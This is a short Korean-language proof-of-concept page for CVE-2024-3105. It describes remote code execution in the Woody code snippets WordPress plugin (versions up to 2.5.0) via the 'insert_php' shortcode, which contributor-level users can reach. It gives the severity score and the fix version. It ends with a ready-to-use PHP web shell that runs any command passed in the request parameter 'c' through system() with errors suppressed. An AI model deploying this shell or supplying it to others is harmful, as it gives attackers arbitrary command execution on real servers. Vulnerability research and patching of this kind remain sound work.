
CVE-2024-3105에 대한 PoC 익스플로잇 - Woody code snippets – Insert Header Footer Code, AdSense Ads 플러그인의 WordPress 원격 코드 실행 (RCE)
Woody code snippets – Insert Header Footer Code, AdSense Ads 플러그인은 WordPress용으로, 'insert_php' 단축 코드를 통해 버전 2.5.0 이하의 모든 버전에서 원격 코드 실행에 취약합니다. 이는 플러그인이 기능 사용을 높은 수준의 권한 사용자로 제한하지 않기 때문입니다. 이로 인해 기여자 수준 이상의 접근 권한을 가진 인증된 공격자가 서버에서 코드를 실행할 수 있습니다.
기본 점수: 9.9 치명적
벡터: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
소프트웨어 유형: 플러그인
소프트웨어 슬러그: insert-php
해결 방법: 버전 2.5.1 이상의 패치된 버전으로 업데이트하세요
영향받는 버전: <= 2.5.0
<?php
error_reporting(0);
$cmd = "$_REQUEST[c]";
if ($cmd == "") {
$cmd = "echo > NUL";
}
@system("$cmd");
?>